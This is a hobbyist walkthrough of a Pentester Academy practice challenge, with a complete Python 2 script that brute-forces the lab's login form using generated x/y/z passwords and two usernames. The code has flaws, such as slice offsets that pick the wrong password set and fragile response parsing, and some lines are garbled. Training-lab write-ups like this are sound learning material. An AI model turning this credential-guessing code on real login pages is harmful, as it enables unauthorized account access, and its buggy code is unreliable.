Hello Guys,
I'm gonna show u how I could solve the challenge 1 of securitytube challenges by writing a simple python script .
Firstly Let's have a look on the challenge (url Below) :
ok it gives us some hints :
Hint:
- Company Domain: PentesterAcademy.com
- Usernames: jack, admin
- Password Complexity: 5 characters and uses only x,y,z lowercase. Password examples - xxyyz, xyzxy, xyxxx etc.
ok as shown in hints it gives us a combination of passwords and 2 usernames it seems to be brute force attack on a form :)
so with a simple calculation the password would be a combination of three letters only (x , y and z ) with a length of 5 characters , so number of probabilities would be ( 3 ^ 5 ) = 243 probability and we have 2 usernames , so number of tries will be done on this form is (243 * 2 = 486) try .
ok let's start coding our script to brute force on this form :
I'm gonna use (urllib2) to connect to a web page ->
#!/usr/bin/env python import urllib2 response = urllib2.urlopen('http://pentesteracademylab.appspot.com//lab/webapp/auth/1/login') print response.info() # do something response.close()
this code will give us and output
Content-Type: text/html; charset=utf-8Cache-Control: no-cache
te: Wed, 16 Oct 2013Vary: Accept-Encoding D a14:59:24 GMT Server: Google Frontend
: closeAlternate-Protocol: 80:quic Connection
it's the header info , so connection successfully done .
Now we need to generate 243 probability of password
Now we need to generate 243 probability of password
- your_list = 'xyz'
- complete_list = []
- for current in xrange(5):
- a = [i for i in your_list]
- for y in xrange(current):
- a = [x+i for i in your_list for x in a]
- complete_list = complete_list+a
this code will generate combination from length (1 to 5 ) so we need to split it and extract only combination for 5 chars length .
- chunk = complete_list[120:363]
- print chunk
- print len(chunk)
the output for chunck will be (243) . Cool :)
now let's make a list for users
now let's make a list for users
- username = ['jack@pentesteracademy.com','admin@pentesteracademy.com']
ok now we created a list for password and usernames . we need to make connection for the vulnerable app and try to connect with generated passwords and usernames .
We need to make a for loop for passwords
- for pw in chunk:
and we'll make another for loop for usernames under the first loop
- for x in username:
then we'll print every single try for username and password
- trying = "Trying with Username \t"+ x +"\t password "+pw + "\n"
and as we know that the url for vulnerable app is
- ('http://pentesteracademylab.appspot.com/lab/webapp/1?email=username&password=password)
so we will replace username parameter with x variable and password with pw variable
- url = ('http://pentesteracademylab.appspot.com/lab/webapp/1?email='+x+'&password='+pw)
that's good , our script now will send requests to the form and try with generated username and password but we didn't get the response yet ! . we need to know if the username and password is right or incorrect . so we'll put in these lines of codes
- request = urllib2.Request(url)
- response = urllib2.urlopen(request)
- back = response.read()[2486:2492]
Attention : for the line
- back = response.read()[2486:2492]
when u get the response you need to specify the line which tells you if the password is right or incorrect
if you tried to put
if you tried to put
- back = response.read()
print back
So , we need to split it from the char 2486 to 2492 and it's the word "failed" .
we'll check if every output from the page is failed or not
- print backif(back!="Failed"):
- cprint ("Success With Username " +x+ "& Password " + pw ,'red')
and successfully the challenge solved ! :D
here's the whole code
here's the whole code
- #!/usr/bin/env python
- '''
- Brute Force On Challenge 1
- Ahmed Sherif
- '''
- import urllib2
- import os
- from termcolor import cprint,colored
- your_list = 'xyz'
- complete_list = []
- for current in xrange(5):
- a = [i for i in your_list]
- for y in xrange(current):
- a = [x+i for i in your_list for x in a]
- complete_list = complete_list+a
- chunk = complete_list[120:363]
- print chunk
- print len(chunk)
- f = open('myfile3.txt', 'w')
- username = ['jack@pentesteracademy.com','admin@pentesteracademy.com']
- for pw in chunk:
- for x in username:
- trying = "Trying with Username \t"+ x +"\t password "+pw + "\n"
- print trying
- url = ('http://pentesteracademylab.appspot.com/lab/webapp/1?email='+x+'&password='+pw)
- request = urllib2.Request(url)
- response = urllib2.urlopen(request)
- back = response.read()[2486:2492]
- print back
- f.write(trying + back + "\n")
- if(back!="Failed"):
- cprint ("Success With Username " +x+ "& Password " + pw ,'red')
- f.close()
or you can download it from here